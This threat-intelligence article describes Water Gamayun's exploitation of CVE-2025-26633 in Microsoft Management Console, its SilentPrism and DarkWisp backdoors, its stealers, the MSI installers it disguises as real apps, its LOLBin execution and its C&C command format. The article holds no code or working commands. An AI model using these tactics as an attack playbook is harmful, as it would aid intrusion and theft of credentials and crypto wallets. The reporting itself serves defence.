CVE-2025-26633 Vulnerability

By Mezo in Vulnerability, Advanced Persistent Threat (APT)

Translate To:

Water Gamayun has been actively exploiting CVE-2025-26633 (aka MSC EvilTwin), a vulnerability in the Microsoft Management Console (MMC) framework, to execute malware using rogue Microsoft Console (.msc) files.

Table of Contents

New Backdoors: SilentPrism and DarkWisp

The cybercriminals behind this zero-day attack have deployed two sophisticated backdoors—SilentPrism and DarkWisp. These tools facilitate persistence, system reconnaissance, and remote control, making them powerful assets for espionage and data theft. The operation has been attributed to a Russian-linked hacking group known as Water Gamayun, also called EncryptHub and LARVA-208.

Attack Methods: Provisioning Packages and MSI Installers

Water Gamayun primarily delivers payloads through fraudulent provisioning packages, signed .msi files and MSC files. They employ techniques like the IntelliJ runnerw.exe process for command execution, increasing stealth and effectiveness.

The Evolution of EncryptHub’s Malware Distribution

Initially, EncryptHub gained attention in June 2024 when they used a GitHub repository to distribute various malware families via a fake WinRAR website. Since then, they have shifted to their own infrastructure for staging and Command-and-Control (C&C) operations.

Masquerading as Legitimate Software

Water Gamayun disguises its malware within .msi installers posing as genuine applications like DingTalk, QQTalk, and VooV Meeting. These installers execute a PowerShell downloader, fetching and running next-stage payloads on compromised systems.

SilentPrism and DarkWisp: Stealthy PowerShell Implants

SilentPrism is a PowerShell-based implant that establishes persistence, executes multiple shell commands, and evades detection using anti-analysis techniques.

DarkWisp, another PowerShell backdoor, specializes in system reconnaissance, data exfiltration, and maintaining long-term access to infected machines.

C&C Communication and Command Execution

Once infected, the malware exfiltrates reconnaissance data to the C&C server and enters a continuous loop, waiting for commands via TCP port 8080. Commands arrive in a format of COMMAND|<base64_encoded_command>, ensuring ongoing interaction and control over the victim’s system.

MSC EvilTwin Loader: Deploying the Rhadamanthys Stealer

One of the most concerning payloads in this attack chain is the MSC EvilTwin loader, which exploits CVE-2025-26633 to execute malicious .msc files. This ultimately leads to the deployment of the Rhadamanthys Stealer , a well-known malware designed for data theft.

Expanding the Arsenal: More Stealers and Custom Variants

Water Gamayun doesn’t rely solely on Rhadamanthys. They also distribute StealC and three custom PowerShell-based stealers—EncryptHub Stealer variants A, B and C. These variants, based on the open-source Kematian Stealer, extract extensive system data, including anti-malware details, installed software, network configurations and running applications.

Targeting Cryptocurrency and Sensitive Data

The stealer malware gathers a wide range of credentials, including Wi-Fi passwords, Windows product keys, browser data and clipboard history. Notably, it searches explicitly for files related to cryptocurrency wallets, indicating an intent to harvest recovery phrases and financial assets.

Living-off-the-Land Techniques for Stealth

A unique feature of one EncryptHub Stealer variant is its use of a living-off-the-land binary (LOLBin) technique. It leverages IntelliJ’s runnerw.exe to proxy the execution of remote PowerShell scripts, further obfuscating its activity.

Propagating Malware through Multiple Channels

Water Gamayun’s threatening MSI packages and binary droppers have been found distributing additional malware families, including the Lumma Stealer, Amadey and various cryptocurrency-focused clippers.

C&C Infrastructure: Remote Control via PowerShell

Analysis of Water Gamayun’s C&C infrastructure (notably 82.115.223[.]182) has revealed that they use PowerShell scripts to download and execute the AnyDesk software for remote access. They also send Base64-encoded remote commands to victim machines for seamless control.

Adaptive and Persistent: Water Gamayun’s Threat Landscape

Water Gamayun’s use of multiple attack vectors, including signed MSI files, LOLBins, and custom payloads, highlights its adaptability in breaching systems. Its sophisticated C&C infrastructure allows it to maintain long-term persistence while evading forensic investigations.